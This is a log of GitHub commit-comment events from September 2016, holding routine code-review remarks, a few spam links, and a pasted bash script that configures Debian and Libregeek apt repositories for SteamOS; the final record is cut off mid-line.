{"id":"4517597430","type":"CommitCommentEvent","actor":{"login":"Lippe35"},"repo":{"name":"KcNirvana/MA-XML-8.0-PORTUGUESE"},"payload":{"comment":{"id":18901957,"position":178,"line":176,"path":"Portuguese/main/XiaomiAuthenticator.apk/res/values-pt-rPT/strings.xml","commit_id":"b8430d7b1d36fb4c998110edfc42d0573496101d","created_at":"2016-09-05T16:03:41Z","updated_at":"2016-09-05T16:03:41Z","body":"Esta é a versão original do ficheiro que foi alterada por nós os dois ao longo do tempo, se estas alterações avançarem vai mexer com a rep toda nos settings em todos os dispositivos. Fica diferente de um lado e de outro"}},"created_at":"2016-09-05T16:03:41Z"}
{"id":"4517605518","type":"CommitCommentEvent","actor":{"login":"ebarendt"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18901976,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T16:05:44Z","updated_at":"2016-09-05T16:05:44Z","body":"It's used in legacy processor, which is admittedly light on accessing real\nfeatures of the gem.\nOn Mon, Sep 5, 2016 at 7:16 AM Matthew Higgins <notifications@github.com>\nwrote:\n\n> I searched for a bit and couldn't find a reference to where Rails devs\n> have declared that they actually do some variation on semantic versioning.\n>\n> Pick another popular open source project, such as Ruby itself. Re-read my\n> point with \"your-favorite-project\", rather than \"Rails\".\n>\n> In my experience, users tend to prefer \"release early and often\" rather\n> than \"bundle a bunch of changes and release a new minor version in a month\".\n>\n> I dislike \"release a new minor version in a month\" as much as \"release a\n> new version after each feature\". Both are prescribed formulas for something\n> requiring more judgement.\n>\n> Ruby/Rails developers may be less averse to use git references in Gemfile\n> than Node/Electron developers in package.json, for example. One way we\n> could address both ends of the spectrum is to utilize pre-releases.\n>\n> We could certainly do .pre releases. That would have been an option in\n> this case (ie 2.4.0.pre). Ruby developers, at least myself, are certainly\n> not averse to git references. I think they are great, actually. It gives\n> risking-taking app developers a chance to try something new without forcing\n> a full release process.\n>\n> In this case, it looks like the new Rails 5 support was not entirely\n> complete.\n>\n> My understanding is that this got the tests to pass, but has not been\n> tried out in a real Rails 5 application. Perhaps I underestimated the\n> rigorousness of this effort?\n>\n> This work is nonetheless really great. I must be more careful about my\n> casual comments...\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/data-axle/superstore/commit/81dbac521e3e79e47a3702fcdd6751cbaa32a955#commitcomment-18900803>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAkkjNO-e7B4T92ImgSb16V36w5D4kAxks5qnCQhgaJpZM4JhoPU>\n> .\n>\n"}},"created_at":"2016-09-05T16:05:44Z"}
{"id":"4517606957","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18901980,"position":null,"line":null,"path":null,"commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T16:06:09Z","updated_at":"2016-09-05T16:06:09Z","body":"Why should i be?"}},"created_at":"2016-09-05T16:06:09Z"}
{"id":"4517608823","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901982,"position":null,"line":null,"path":null,"commit_id":"e96b4d9dcf2a7a9f3b1a18f1c55be882530fed3b","created_at":"2016-09-05T16:06:37Z","updated_at":"2016-09-05T16:06:37Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Ge2oZ3WHTGGJt7zWpwE7Wg"}},"created_at":"2016-09-05T16:06:37Z"}
{"id":"4517610591","type":"CommitCommentEvent","actor":{"login":"robske110"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18901984,"position":9,"line":15,"path":"src/robske_110/EasyFloatingTextListener.php","commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T16:07:05Z","updated_at":"2016-09-05T16:07:05Z","body":"😂😂"}},"created_at":"2016-09-05T16:07:05Z"}
{"id":"4517611875","type":"CommitCommentEvent","actor":{"login":"baileypa"},"repo":{"name":"baileypa/website"},"payload":{"comment":{"id":18901985,"position":null,"line":null,"path":null,"commit_id":"0115a388b25c8a68bf6c679efccf4fc04f475231","created_at":"2016-09-05T16:07:23Z","updated_at":"2016-09-05T16:07:23Z","body":"associating wtih #3 "}},"created_at":"2016-09-05T16:07:23Z"}
{"id":"4517612726","type":"CommitCommentEvent","actor":{"login":"valentina09"},"repo":{"name":"valentina09/Esperanza0017"},"payload":{"comment":{"id":18901987,"position":null,"line":null,"path":null,"commit_id":"b1249a4bdab36e7960c28dd90a0a94b177eba180","created_at":"2016-09-05T16:07:37Z","updated_at":"2016-09-05T16:07:37Z","body":"http://esperanza0017.blogspot.com\r\n\r\n"}},"created_at":"2016-09-05T16:07:37Z"}
{"id":"4517613641","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Web"},"payload":{"comment":{"id":18901992,"position":null,"line":null,"path":null,"commit_id":"12c0c6c068cb499d2e56a9562ad2eae4e1059901","created_at":"2016-09-05T16:07:51Z","updated_at":"2016-09-05T16:07:51Z","body":"#3 "}},"created_at":"2016-09-05T16:07:51Z"}
{"id":"4517613942","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18901993,"position":3,"line":3,"path":"wk2/DOM-Exercises.js","commit_id":"61b9737a7e51aa8c6bd7062f42877451fb8f3224","created_at":"2016-09-05T16:07:55Z","updated_at":"2016-09-05T16:07:55Z","body":"I think we just want to put this stuff in a function and pass a selector to it (we should probably use `querySelectorAll` instead of `getElementsByTagName` because we don't know whether the selector will be just a tag name)"}},"created_at":"2016-09-05T16:07:55Z"}
{"id":"4517615974","type":"CommitCommentEvent","actor":{"login":"jhstanton"},"repo":{"name":"ku-fpg/kansas-lava"},"payload":{"comment":{"id":18902001,"position":null,"line":null,"path":null,"commit_id":"ea63395903e933dc7b94ee2219c2f505cf01834d","created_at":"2016-09-05T16:08:27Z","updated_at":"2016-09-05T16:08:27Z","body":"Looks like there is an extra '.' in that link - https://jdebp.eu/FGA/bit-shifts-in-vhdl.html seems to work though. "}},"created_at":"2016-09-05T16:08:27Z"}
{"id":"4517617374","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18902003,"position":15,"line":15,"path":"wk2/DOM-Exercises.js","commit_id":"61b9737a7e51aa8c6bd7062f42877451fb8f3224","created_at":"2016-09-05T16:08:50Z","updated_at":"2016-09-05T16:08:50Z","body":"This too should be in a function, and we want to return an array. `querySelectorAll` will return an array-like object that we will have to convert to an array."}},"created_at":"2016-09-05T16:08:50Z"}
{"id":"4517620557","type":"CommitCommentEvent","actor":{"login":"valentina09"},"repo":{"name":"valentina09/Esperanza0017"},"payload":{"comment":{"id":18902012,"position":null,"line":null,"path":null,"commit_id":"b1249a4bdab36e7960c28dd90a0a94b177eba180","created_at":"2016-09-05T16:09:37Z","updated_at":"2016-09-05T16:09:37Z","body":"![714t 2q4xvl _sx522_](https://cloud.githubusercontent.com/assets/10797731/18253278/6aaff6b4-7361-11e6-856d-cbbedcf2fdd7.jpg)\r\n![0804_fhp_9 _v284952475_](https://cloud.githubusercontent.com/assets/10797731/18253305/97bdaee4-7361-11e6-9414-e4239089cf16.jpg)\r\n\r\n[http://amazonassociate10.blogspot.com]"}},"created_at":"2016-09-05T16:09:37Z"}
{"id":"4517622413","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"KarenNemeth/Spiced-Academy"},"payload":{"comment":{"id":18902015,"position":24,"line":24,"path":"wk2/DOM-Exercises.js","commit_id":"61b9737a7e51aa8c6bd7062f42877451fb8f3224","created_at":"2016-09-05T16:10:08Z","updated_at":"2016-09-05T16:10:08Z","body":"This stuff should be in a function too. Clearing out the body's html is fine but I think it is more fun to leave it there so it feels like you are vandalizing the page."}},"created_at":"2016-09-05T16:10:08Z"}
{"id":"4517636456","type":"CommitCommentEvent","actor":{"login":"defrag257"},"repo":{"name":"comdiv/opencv"},"payload":{"comment":{"id":18902031,"position":null,"line":null,"path":null,"commit_id":"77ec6fad1db031f7e2d279937d9b44e82a694cf8","created_at":"2016-09-05T16:13:55Z","updated_at":"2016-09-05T16:13:55Z","body":"Conversion from wstring to string is not proper, because it will drop some Unicode characters in Windows.\r\n\r\nFor example, in the English version of Windows, conversion from wstring to string will only convert 256 characters in Windows-1252, while there is 1112064 characters in Unicode.\r\n\r\nInstead, you should add w_imread and w_imwrite which accept wchar_t, and modify the inner implementation calls _wfopen instead of fopen. _wfopen will call CreateFileW which accepts Unicode, but fopen calls CreateFileA which accepts Windows-1252."}},"created_at":"2016-09-05T16:13:55Z"}
{"id":"4517636726","type":"CommitCommentEvent","actor":{"login":"SubDragonzj"},"repo":{"name":"SubDragonzj/android_device_xiaomi_dior"},"payload":{"comment":{"id":18902032,"position":null,"line":null,"path":null,"commit_id":"9d7b95891ddbd55dae3be14764e54c328a6b8d65","created_at":"2016-09-05T16:13:59Z","updated_at":"2016-09-05T16:13:59Z","body":"dlmalloc not support in N"}},"created_at":"2016-09-05T16:13:59Z"}
{"id":"4517640385","type":"CommitCommentEvent","actor":{"login":"santfloyd"},"repo":{"name":"santfloyd/python-course"},"payload":{"comment":{"id":18902038,"position":null,"line":null,"path":null,"commit_id":"4afaeeafa01bdd7defd516df6213e47b3d6e81cd","created_at":"2016-09-05T16:15:04Z","updated_at":"2016-09-05T16:15:04Z","body":"I don´t know what is wrong with this code, when i run the program ir prompts a traceback error pointing out a TypeError: ´int´ object is not callable... Any suggestion?\r\n\r\nimport re\r\nimport urllib\r\nfrom BeautifulSoup import *\r\nnumlist=list()\r\n\r\nurl=\"http://python-data.dr-chuck.net/comments_270350.html\"\r\nhtml=urllib.urlopen(url).read()\r\n\r\nsoup = BeautifulSoup(html)\r\nsum=0\r\n\r\ntags = soup('span')\r\nfor tag in tags:\r\n\ty=str(tag)\r\n\tnum=re.findall(\"[0-9]+\",y)\r\n\tnumlist.extend(num)\r\n\r\nx=[int(ele) for ele in numlist]\r\nsuma=sum(x)\r\nprint suma"}},"created_at":"2016-09-05T16:15:04Z"}
{"id":"4517641019","type":"CommitCommentEvent","actor":{"login":"scherler"},"repo":{"name":"jenkinsci/blueocean-plugin"},"payload":{"comment":{"id":18902039,"position":33,"line":84,"path":"blueocean-dashboard/src/test/js/log-spec.js","commit_id":"986fd51fc6ab799ac96e07da8a25b56143e0294c","created_at":"2016-09-05T16:15:16Z","updated_at":"2016-09-05T16:15:16Z","body":"Why did you commented the test @imeredith ?"}},"created_at":"2016-09-05T16:15:16Z"}
{"id":"4517643018","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18902043,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-05T16:15:50Z","updated_at":"2016-09-05T16:15:50Z","body":"@Sami32 The PS3 support both 44.1 and 48 kHz, but they have this strange system where you have to choose between them in the PS3 audio configuration. I'm pretty sure that's why UMS has this strange constrict with 44.1 or 48 kHz as well, the settings are ment to match the configuration made on the PS3 and comes from PS3 Media Server."}},"created_at":"2016-09-05T16:15:50Z"}
{"id":"4517643551","type":"CommitCommentEvent","actor":{"login":"fintelkai"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18902045,"position":null,"line":null,"path":null,"commit_id":"1c4f685b13ab606f7ad71299547d22cf3eec6cc2","created_at":"2016-09-05T16:15:58Z","updated_at":"2016-09-05T16:15:58Z","body":"This commit changed where org-export is looking for `org-async-init.el`. You replaced\r\n\r\n```emacs\r\n(let ((dir (configuration-layer/get-layer-property 'org :dir)))\r\n  (setq org-export-async-init-file (concat dir \"org-async-init.el\")))\r\n```\r\n\r\nwith\r\n\r\n```emacs\r\n(let ((dir (configuration-layer/get-layer-local-dir 'org)))\r\n  (setq org-export-async-init-file (concat dir \"org-async-init.el\")))\r\n```\r\n\r\nNow, org-export is looking for `.../layers/+emacs/org/local/org-async-init.el` but this commit left `org-async-init.el` where it is `.../layers/+emacs/org/org-async-init.el`. \r\n\r\nThis makes org async export fail."}},"created_at":"2016-09-05T16:15:58Z"}
{"id":"4517645307","type":"CommitCommentEvent","actor":{"login":"varund7726"},"repo":{"name":"ResurrectionRemix/Resurrection_packages_apps_Settings"},"payload":{"comment":{"id":18902048,"position":null,"line":null,"path":null,"commit_id":"54343cc5f66461477875616565c170b858acbec0","created_at":"2016-09-05T16:16:29Z","updated_at":"2016-09-05T16:16:29Z","body":"5.7.0* and I don't maintain a msim device....better you ask one of your maintainers who make multi sim builds.   \r\n\r\nAs for backlight its present since beginning on my devices "}},"created_at":"2016-09-05T16:16:29Z"}
{"id":"4517645315","type":"CommitCommentEvent","actor":{"login":"mousa-ahmed"},"repo":{"name":"fail0verflow/ps4-radeon-patches"},"payload":{"comment":{"id":18902047,"position":null,"line":null,"path":null,"commit_id":"cf13fcbcb2bf35eaa073af8ff9824cf645d185c3","created_at":"2016-09-05T16:16:29Z","updated_at":"2016-09-05T16:16:29Z","body":"#!/bin/bash\r\n# -----------------------------------------------------------------------\r\n# Author: \tMichael DeGuzis\r\n# Git:\t\thttps://github.com/ProfessorKaos64/SteamOS-Tools\r\n# Scipt Name:\tadd-debian-repos.sh\r\n# Script Ver:\t0.5.1\r\n# Description:\tThis script automatically enables Debian and/or Libregeek \r\n#\t\trepositories\r\n#\r\n#\t\tSee: https://wiki.debian.org/AptPreferences#Pinning\r\n#\r\n# Usage:\t./add-debian-repos [install|uninstall|--help]\r\n# Extra args:\t--enable-testing --debian-only\r\n# ------------------------------------------------------------------------\r\n\r\n# remove old custom files\r\nrm -f \"log.txt\"\r\n\r\n# Specify a final arg for any extra options to build in later\r\n# The command being echo'd will contain the last arg used.\r\n# See: http://www.cyberciti.biz/faq/linux-unix-bsd-apple-osx-bash-get-last-argument/\r\nexport final_opts=$(echo \"${@: -1}\")\r\n\r\n# set default actions if no args are specified\r\ninstall=\"yes\"\r\ntest_repo=\"no\"\r\ndebian_only=\"no\"\r\n\r\n# get top level current dir\r\ncurrent_dir=$(basename \"$PWD\") \r\n\r\n# check for and set install status\r\nif [[ \"$1\" == \"install\" ]]; then\r\n\tinstall=\"yes\"\r\nelif [[ \"$1\" == \"uninstall\" ]]; then\r\n    \tinstall=\"no\"\r\nfi\r\n\r\n# enable test repo if desired\r\nif [[ \"$final_opts\" == \"--debian-only\" ]]; then\r\n\t\r\n\tdebian_only=\"yes\"\r\n\t\r\nelif [[ \"$final_opts\" == \"--enable-testing\" ]]; then\r\n\t\r\n\ttest_repo=\"yes\"\r\n\t\r\nelif [[ \"$final_opts\" != \"--enable-testing\" ]]; then\r\n    \t\r\n    \ttest_repo=\"no\"\r\n    \t# ensure testing repo is removed\r\n    \tsudo sed -ei '/Libregeek Debian testing repository/,+1d' \"/etc/apt/sources.list.d/steamos-tools.list\"\r\n    \t\r\nfi\r\n\r\ncheck_gpg()\r\n{\r\n\tif [[ \"$current_dir\" != \"SteamOS-Tools\" ]]; then\r\n\t\r\n\t\t#  Find where the user cloned SteamOS-Tools to\r\n\t\techo -e \"==INFO==\\nadd-debian-repos.sh was run from a foreign directory!\"\r\n\t\techo -e \"Assessing location of SteamoS-Tools, please wait...\\n\"\r\n\t\tscriptdir=$(find / -name \"SteamOS-Tools\" 2> /dev/null)\r\n\t\t\r\n\telif [[ \"$scriptdir\" == \"\" ]]; then \r\n\t\r\n\t\t# We are in SteamOS-Tools, but it is not called from desktop-software.sh\r\n\t\t# set scriptdir to pwd\r\n\t\tscriptdir=\"$PWD\"\r\n\t\t\r\n\tfi\r\n\r\n\techo -e \"==> Importing GPG keys\\n\"\r\n\tsleep 1s\r\n\r\n\t# Key Desc: Libregeek Signing Key\r\n\t# Key ID: 34C589A7\r\n\t# Full Key ID: 8106E72834C589A7\r\n\techo -ne \"Adding Libregeek public signing key: \" && \\\r\n\t$scriptdir/utilities/gpg-import.sh 8106E72834C589A7 2> /dev/null\r\n\t\r\n}\r\n\r\nfunct_set_vars()\r\n{\r\n\t# Set default user options\r\n\treponame=\"jessie\"\r\n\tbackports_reponame=\"jessie-backports\"\r\n\tsteamos_tools_reponame=\"steamos-tools\"\r\n\t\r\n\t# tmp vars\r\n\tsourcelist_tmp=\"${reponame}.list\"\r\n\tbackports_sourcelist_tmp=\"${backports_reponame}.list\"\r\n\tsteamos_tools_sourcelist_tmp=\"${steamos_tools_reponame}.list\"\r\n\t\r\n\tprefer_tmp=\"${reponame}\"\r\n\tbackports_prefer_tmp=\"${backports_reponame}\"\r\n\tsteamos_prefer_tmp=\"steamos\"\r\n\tsteamos_tools_prefer_tmp=\"${steamos_tools_reponame}\"\r\n\t\r\n\t# target vars\r\n\tsourcelist=\"/etc/apt/sources.list.d/${reponame}.list\"\r\n\tbackports_sourcelist=\"/etc/apt/sources.list.d/${backports_reponame}.list\"\r\n\tsteamos_tools_sourcelist=\"/etc/apt/sources.list.d/${steamos_tools_reponame}.list\"\r\n\t\r\n\tprefer=\"/etc/apt/preferences.d/${reponame}\"\r\n\tbackports_prefer=\"/etc/apt/preferences.d/${backports_reponame}\"\r\n\tsteamos_prefer=\"/etc/apt/preferences.d/steamos\"\r\n\tsteamos_tools_prefer=\"/etc/apt/preferences.d/${steamos_tools_reponame}\"\r\n}\r\n\r\nshow_help()\r\n{\r\n\t\r\n\tclear\r\n\tcat<<- EOF\r\n\t###########################################################\r\n\tUsage instructions\r\n\t###########################################################\r\n\tYou can run this script as such:\r\n\t\r\n\t./add-debian-repos [install|uninstall|--help]\r\n\t\r\n\tAdditional arguments:\r\n\t\r\n\t\"--enable-testing\" (Add libregeek testing repos)\r\n\t\"--debian-only\" (only add Debian sources)\r\n\t\r\n\tEOF\r\n\t\r\n}\r\n\r\nmain()\r\n{\r\n\t#####################################################\r\n\t# Install/Uninstall process\r\n\t#####################################################\r\n\t\r\n\tif [[ \"$install\" == \"yes\" ]]; then\r\n\t\tclear\r\n\t\t\r\n\t\t# Check/add gpg key for libregeek\r\n\t\tcheck_gpg\r\n\t\t\r\n\t\tif [[ \"$debian_only\" == \"no\" ]]; then\r\n\t\t\r\n\t\t\techo -e \"\\n==> Adding Debian ${reponame}, ${backports_reponame}, and ${steamos_tools_reponame} sources\"\r\n\t\t\tEOF\r\n\t\t\t\r\n\t\telif [[ \"$debian_only\" == \"yes\" ]]; then\r\n\t\t\r\n\t\t\techo -e \"\\n==> Adding Debian ${reponame}, and ${backports_reponame} only\"\r\n\t\t\tEOF\r\n\t\t\r\n\t\tfi\r\n\t\t\r\n\t\tif [[ \"$test_repo\" == \"yes\" ]]; then\r\n\t\t\r\n\t\t\techo -ne \"    [SteamOS-Tools testing enabled]\\n\\n\"\r\n\t\t\t\r\n\t\tfi\r\n\t\t\r\n\t\tsleep 1s\r\n\t\t\r\n\t\t# Check for existance of /etc/apt/preferences file (deprecated, see below)\r\n\t\tif [[ -f \"/etc/apt/preferences\" ]]; then\r\n\t\t\t# backup preferences file\r\n\t\t\techo -e \"==> Backing up /etc/apt/preferences to /etc/apt/preferences.bak\\n\"\r\n\t\t\tsudo mv \"/etc/apt/preferences\" \"/etc/apt/preferences.bak\"\r\n\t\t\tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\t# Check for existance of /etc/apt/preferences.d/{steamos_prefe} file\r\n\t\tif [[ -f ${steamos_prefer} ]]; then\r\n\t\t\t# backup preferences file\r\n\t\t\techo -e \"==> Backing up ${steamos_prefer} to ${steamos_prefer}.bak\\n\"\r\n\t\t\tsudo mv ${steamos_prefer} ${steamos_prefer}.bak\r\n\t\t\tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\t# Check for existance of /etc/apt/preferences.d/{prefer} file\r\n\t\tif [[ -f ${prefer} ]]; then\r\n\t\t\t# backup preferences file\r\n\t\t\techo -e \"==> Backing up ${prefer} to ${prefer}.bak\\n\"\r\n\t\t\tsudo mv ${prefer} ${prefer}.bak\r\n\t\t\tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\t# Check for existance of /etc/apt/preferences.d/{backports_prefer} file\r\n\t\tif [[ -f ${backports_prefer} ]]; then\r\n\t\t\t# backup preferences file\r\n\t\t\techo -e \"==> Backing up ${backports_prefer} to ${backports_prefer}.bak\\n\"\r\n\t\t\tsudo mv ${backports_prefer} ${backports_prefer}.bak\r\n\t\t\tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\t# Check for existance of /etc/apt/preferences.d/{steamos_tools_prefer} file\r\n\t\tif [[ -f ${steamos_tools_prefer} ]]; then\r\n\t\t\t# backup preferences file\r\n\t\t\techo -e \"==> Backing up ${steamos_tools_prefer} to ${steamos_tools_prefer}.bak\\n\"\r\n\t\t\tsudo mv ${steamos_tools_prefer} ${steamos_tools_prefer}.bak\r\n\t\t\tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\r\n\t\t# Create and add required text to preferences file\r\n\t\t# Verified policy with apt-cache policy\r\n\t\tcat <<-EOF > ${prefer_tmp}\r\n\t\tPackage: *\r\n\t\tPin: origin \"\"\r\n\t\tPin-Priority:110\r\n\t\t\r\n\t\tPackage: *\r\n\t\tPin: release o=Debian \r\n\t\tPin-Priority:110\r\n\t\tEOF\r\n\t\t\r\n\t\tcat <<-EOF > ${backports_prefer_tmp}\r\n\t\tPackage: *\r\n\t\tPin: origin \"\"\r\n\t\tPin-Priority:120\r\n\t\t\r\n\t\tPackage: *\r\n\t\tPin: release o=Debian \r\n\t\tPin-Priority:110\r\n\t\tEOF\r\n\t\r\n\t\tcat <<-EOF > ${steamos_prefer_tmp}\r\n\t\tPackage: *\r\n\t\tPin: release l=Steam\r\n\t\tPin-Priority: 900\r\n\t\t\r\n\t\tPackage: *\r\n\t\tPin: release l=SteamOS\r\n\t\tPin-Priority: 900\r\n\t\tEOF\r\n\t\t\r\n\t\t# modify pinning based on setup for testing or not\r\n\t\tif [[ \"$test_repo\" == \"no\" && \"$debian_repos\" == \"no\" ]]; then\r\n\t\t\t\r\n\t\t\tcat <<-EOF > ${steamos_tools_prefer_tmp}\r\n\t\t\tPackage: *\r\n\t\t\tPin: release n=brewmaster\r\n\t\t\tPin-Priority:150\r\n\t\t\tEOF\r\n\t\t\r\n\t\telif [[ \"$test_repo\" == \"yes\" && \"$debian_repos\" == \"no\" ]]; then\r\n\t\t\r\n\t\t\tcat <<-EOF > ${steamos_tools_prefer_tmp}\r\n\t\t\tPackage: *\r\n\t\t\tPin: release n=brewmaster\r\n\t\t\tPin-Priority:150\r\n\t\t\t\r\n\t\t\tPackage: *\r\n\t\t\tPin: release n=brewmaster_testing\r\n\t\t\tPin-Priority:150\r\n\t\t\tEOF\r\n\t\t\t\r\n\t\tfi\r\n\t\t\r\n\t\t# move tmp var files into target locations\r\n\t\tsudo mv  ${prefer_tmp}  ${prefer}\r\n\t\tsudo mv  ${backports_prefer_tmp}  ${backports_prefer}\r\n\t\tsudo mv  ${steamos_prefer_tmp}  ${steamos_prefer}\r\n\t\t\r\n\t\t# only move steamos tools if the file is actually going to be populated\r\n\t\tif [[  \"$debian_repos\" == \"no\" ]]; then\r\n\t\t\r\n\t\t\tsudo mv  ${steamos_tools_prefer_tmp}  ${steamos_tools_prefer}\r\n\t\t\t\r\n\t\tfi\r\n\t\t\r\n\t\t#####################################################\r\n\t\t# Check for lists in repos.d\r\n\t\t#####################################################\r\n\t\t\r\n\t\t# If it does not exist, create it\r\n\t\t\r\n\t\tif [[ -f ${sourcelist} ]]; then\r\n\t        \t# backup sources list file\r\n\t        \techo -e \"==> Backing up ${sourcelist} to ${sourcelist}.bak\\n\"\r\n\t        \tsudo mv ${sourcelist} ${sourcelist}.bak\r\n\t        \tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\tif [[ -f ${backports_sourcelist} ]]; then\r\n\t        \t# backup sources list file\r\n\t        \techo -e \"==> Backing up ${backports_sourcelist} to ${backports_sourcelist}.bak\\n\"\r\n\t        \tsudo mv ${backports_sourcelist} ${backports_sourcelist}.bak\r\n\t        \tsleep 1s\r\n\t\tfi\r\n\t\t\r\n\t\tif [[ -f ${steamos_tools_sourcelist} ]]; then\r\n\t        \t# backup sources list file\r\n\t        \techo -e \"==> Backing up ${steamos_tools_sourcelist} to ${steamos_tools_sourcelist}.bak\\n\"\r\n\t        \tsudo mv ${steamos_tools_sourcelist} ${steamos_tools_sourcelist}.bak\r\n\t        \tsleep 1s\r\n\t\tfi\r\n\r\n\t\t#####################################################\r\n\t\t# Create and add required text to jessie.list\r\n\t\t#####################################################\r\n\r\n\t\t# Debian jessie\r\n\t\tcat <<-EOF > ${sourcelist_tmp}\r\n\t\t# Debian-jessie repo\r\n\t\tdeb http://httpredir.debian.org/debian/ jessie main contrib non-free\r\n\t\tdeb-src http://httpredir.debian.org/debian/ jessie main contrib non-free\r\n\t\tEOF\r\n\t\t\r\n\t\t# Debian jessie-backports\r\n\t\tcat <<-EOF > ${backports_sourcelist_tmp}\r\n\t\tdeb http://httpredir.debian.org/debian jessie-backports main\r\n\t\tEOF\r\n\t\t\r\n\t\t# packages.libregeek.org\r\n\t\tif [[ \"$test_repo\" == \"no\" && \"$debian_only\" == \"no\" ]]; then\r\n\t\t\r\n\t\t\tcat <<-EOF > ${steamos_tools_sourcelist_tmp}\r\n\t\t\t# Libregeek Debian repository\r\n\t\t\tdeb http://packages.libregeek.org/SteamOS-Tools/ brewmaster main games\r\n\t\t\tdeb-src http://packages.libregeek.org/SteamOS-Tools/ brewmaster main games\r\n\t\t\tEOF\r\n\t\t\t\r\n\t\telif [[ \"$test_repo\" == \"yes\" && \"$debian_only\" == \"no\" ]];then\r\n\t\t\r\n\t\t\tcat <<-EOF > ${steamos_tools_sourcelist_tmp}\r\n\t\t\t# Libregeek Debian repository\r\n\t\t\tdeb http://packages.libregeek.org/SteamOS-Tools/ brewmaster main games\r\n\t\t\tdeb-src http://packages.libregeek.org/SteamOS-Tools/ brewmaster main games\r\n\t\t\t\r\n\t\t\t# Libregeek Debian testing repository\r\n\t\t\tdeb http://packages.libregeek.org/SteamOS-Tools/ brewmaster_testing main games\r\n\t\t\tEOF\r\n\t\t\t\r\n\t\tfi\r\n\r\n\t\t# move tmp var files into target locations\r\n\t\tsudo mv  ${sourcelist_tmp} ${sourcelist}\r\n\t\tsudo mv  ${backports_sourcelist_tmp} ${backports_sourcelist}\r\n\t\t\r\n\t\t# Only move file if populated above\r\n\t\tif [[ \"$debian_only\" == \"no\" ]]; then\r\n\t\t\r\n\t\t\tsudo mv  ${steamos_tools_sourcelist_tmp} ${steamos_tools_sourcelist}\r\n\t\t\t\r\n\t\tfi\r\n\t\t\r\n\t\t# Update system\r\n\t\techo -e \"\\n==> Updating index of packages...\\n\"\r\n\t\tsleep 2s\r\n\t\tsudo apt-get update\r\n\r\n\t\t#####################################################\r\n\t\t# Remind user how to install\r\n\t\t#####################################################\r\n\t\t\r\n\t\tclear\r\n\t\tcat <<-EOF\r\n\t\t#################################################################\r\n\t\tHow to use\r\n\t\t#################################################################\r\n\t\tYou can now not only install package from the SteamOS repository,\r\n\t\tbut also from the Debian and Libregeek repositories with either:\r\n\t\t\r\n\t\t'sudo apt-get install <package_name>'\r\n\t\t'sudo apt-get -t [release] install <package_name>'\r\n\t\t\r\n\t\tWarning: If the apt package manager seems to want to remove a lot\r\n\t\tof packages you have already installed, be very careful about proceeding.\r\n\t\t\r\n\t\tEOF\r\n\t\r\n\telif [[ \"$install\" == \"no\" ]]; then\r\n\t\tclear\r\n\t\techo -e \"==> Removing debian repositories...\\n\"\r\n\t\tsleep 2s\r\n\t\t\r\n\t\t# sourcelists (original)\r\n\t\tsudo rm -f ${sourcelist}\r\n\t\tsudo rm -f ${backports_sourcelist}\r\n\t\tsudo rm -f ${multimedia_sourcelist}\r\n\t\tsudo rm -f ${steamos_tools_sourcelist}\r\n\t\t\r\n\t\t# preference files (original)\r\n\t\tsudo rm -f ${prefer}\r\n\t\tsudo rm -f ${steamosprefer}\r\n\t\tsudo rm -f ${mulitmedia_prefer}\r\n\t\tsudo rm -f ${steamos_tools_prefer}\r\n\t\t\r\n\t\t# sourcelist backups\r\n\t\tsudo rm -f ${sourcelist}.bak\r\n\t\tsudo rm -f ${backports_sourcelist}.bak\r\n\t\tsudo rm -f ${multimedia_sourcelist}.bak\r\n\t\tsudo rm -f ${steamos_tools_sourcelist}.bak\r\n\t\t\r\n\t\t# prefer backups\r\n\t\tsudo rm -f ${prefer}.bak\r\n\t\tsudo rm -f ${steamosprefer}.bak\r\n\t\tsudo rm -f ${mulitmedia_prefer}.bak\r\n\t\tsudo rm -f ${steamos_tools_prefer}.bak\r\n\t\t\r\n\t\tsleep 2s\r\n\t\tsudo apt-get update\r\n\t\techo \"Done!\"\r\n\tfi\r\n}\r\n\r\n#Show help if requested\r\nif [[ \"$1\" == \"--help\" ]]; then\r\n        show_help\r\n\texit 0\r\nfi\r\n#####################################################\r\n# handle prerequisite software\r\n#####################################################\r\nfunct_set_vars\r\n\r\n#####################################################\r\n# MAIN\r\n#####################################################\r\nmain | tee log_temp.txt\r\n\r\n#####################################################\r\n# cleanup\r\n#####################################################\r\n\r\n# convert log file to Unix compatible ASCII\r\nstrings log_temp.txt > log.txt\r\n\r\n# strings does catch all characters that I could \r\n# work with, final cleanup\r\nsed -i 's|\\[J||g' log.txt\r\n\r\n# remove file not needed anymore\r\nrm -f 